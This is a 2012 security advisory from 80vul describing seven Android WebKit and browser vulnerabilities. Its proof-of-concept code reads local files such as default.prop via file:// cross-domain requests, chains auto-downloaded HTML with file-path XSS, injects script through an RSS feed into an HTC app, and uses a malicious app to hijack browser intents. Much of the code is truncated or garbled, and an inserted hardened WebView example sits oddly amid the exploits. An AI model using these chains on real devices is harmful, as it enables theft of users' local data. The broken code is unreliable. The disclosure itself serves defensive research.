Android Webkit XSS / Cross Domain Issues

Posted Feb 8, 2012
Authored by 80vul | Site 80vul.com

Android suffers from multiple cross site scripting, cross domain, auto file download and cross protocol vulnerabilities.

tags | exploit, vulnerability, protocol, xss
MD5 | a5188b0eff042c2832d8d4466813b51c

Android Multiple Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt

Ph4nt0m Webzine 0x06 has three papers on Android application security,
covering the development environment, browser security and inter-application
communication, and published a lot of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allows local HTML files to cross into any http domain and the local

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}


//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
var ret = xmlhttp.responseText;


[0day-NO.1] android-webkit cross-protocol vulnerability

This vulnerability allows crossing from http to the file protocol. Demo:

<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///default.prop";

location.php codz:

[0day-NO.2] android-webkit file:// protocol xss vulnerability

On the android-webkit file:// protocol, the directory and file name are not
filtered, which leads to cross-site scripting attacks. Demo:

visit this : file:///80vul.com/<script>alert(1);</script>

[0day-NO.3] android-browser/firefox auto download the file vulnerability

android-browser/firefox handle Content-Disposition: attachment without any
safety prompt, so this vulnerability lets an evil HTML file be downloaded
automatically to the user's local directory.

test this code:

header("Content-Disposition: attachment:filename=autodown.htm");
print $data;

the local file name and the path:

android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox --> /sdcard/download/autodown.php

So, let's play a jigsaw puzzle:

<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";

<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///sdcard/Download/autodown.htm";

Now we can execute arbitrary JS code in the local domain, and we can cross
into any http domain and local files using [0day-NO.0].

and go on ...

[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability

By controlling the second argument of webview.loadDataWithBaseURL(), JavaScript
can cross to the file:// protocol, like
<script>window.location='file://///default.prop';</script>. So the demo apk:

WebView webview;
webview = (WebView) findViewById(R.id.webview);
webview.setWebChromeClient(new WebChromeClient());
webview.loadDataWithBaseURL("http://www.baidu.com/", data,
"text/html", "utf-8", null);

[0day-NO.5] com.htc.googlereader XSS vulnerability

com.htc.googlereader is an app on HTC Mobile [G10]. There is an XSS
vulnerability in this app; decompiling it turned up this code:

label399: String str = this.mHeadlineShown.getSummary();
if (str.trim().contains("<iframe"))
this.mWebView.loadData(str, "text/html", "utf-8");
break label246;
this.mWebView.loadDataWithBaseURL("http://", str, "text/html",
"utf-8", null);
break label246;

The "str" value is not filtered and can be controlled by an evil RSS feed:

<description><![CDATA[aa<script src='
<pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>

When the unread RSS item is opened, the XSS triggers. Because this goes through
mWebView.loadDataWithBaseURL(), it can cross to file:// via [0day-NO.4].
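
A hardened counterpart to the loadDataWithBaseURL() calls in [0day-NO.4] and [0day-NO.5], added here as an example and not code from the advisory or from the HTC app: it renders an untrusted feed summary with script disabled, file and content access off, local-scheme loads refused, and no http base URL. The package, class name and sample summary are hypothetical, and it assumes the Android SDK at API level 24 or later.

```java
package com.example.reader; // hypothetical package name

import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebResourceRequest;
import android.webkit.WebResourceResponse;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import java.io.ByteArrayInputStream;

public class SafeSummaryActivity extends Activity { // hypothetical class
    // Constructed stand-in for an attacker-controlled RSS <description>.
    static final String SUMMARY = "<p>headline</p><iframe src='file:///default.prop'></iframe>";

    // file: and content: are the schemes that reach device-local data.
    static boolean isLocalScheme(Uri uri) {
        String scheme = uri.getScheme();
        return "file".equalsIgnoreCase(scheme) || "content".equalsIgnoreCase(scheme);
    }

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webview = new WebView(this);
        setContentView(webview);

        WebSettings settings = webview.getSettings();
        settings.setJavaScriptEnabled(false);                // feed text needs no script
        settings.setAllowFileAccess(false);                  // refuse file:// loads
        settings.setAllowContentAccess(false);               // refuse content:// loads
        settings.setAllowFileAccessFromFileURLs(false);      // API 16+
        settings.setAllowUniversalAccessFromFileURLs(false); // API 16+

        webview.setWebViewClient(new WebViewClient() {
            @Override // API 24+: returning true cancels a navigation to a local scheme
            public boolean shouldOverrideUrlLoading(WebView v, WebResourceRequest r) {
                return isLocalScheme(r.getUrl());
            }
            @Override // API 21+: answer local-scheme resource loads with an empty body
            public WebResourceResponse shouldInterceptRequest(WebView v, WebResourceRequest r) {
                if (!isLocalScheme(r.getUrl())) return null; // default handling
                return new WebResourceResponse("text/plain", "utf-8",
                        new ByteArrayInputStream(new byte[0]));
            }
        });
        // A null base URL defaults to about:blank instead of a real http origin.
        webview.loadDataWithBaseURL(null, SUMMARY, "text/html", "utf-8", null);
    }
}
```

The two file-URL settings also close the local cross-domain behaviour described in [0day-NO.0] for any page that does end up loaded from file://.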

[0day-NO.6] Some Browsers for android Cross-Application Scripting

An evil app can cross into the browser and execute arbitrary JS code in the
local domain. The demo app code:

//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;
//com.opera.browser com.opera.Opera

//org.mozilla.firefox org.mozilla.firefox.App

//com.android.browser com.android.browser.BrowserActivity

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TesttestActivity extends Activity {
static final String mPackage = "com.android.browser";
static final String mClass = "com.android.browser.BrowserActivity";
static final String gomPackage = "com.opera.browser";
static final String gomClass = "com.opera.Opera";
static final String mUrl = "http://www.80vul.com/autodown.php";
static final int mSleep = 15000;
public void onCreate(Bundle savedInstanceState) {
try {
catch (InterruptedException e) {}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mClass));
private void startBrowserActivitygo(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(gomPackage,gomClass));


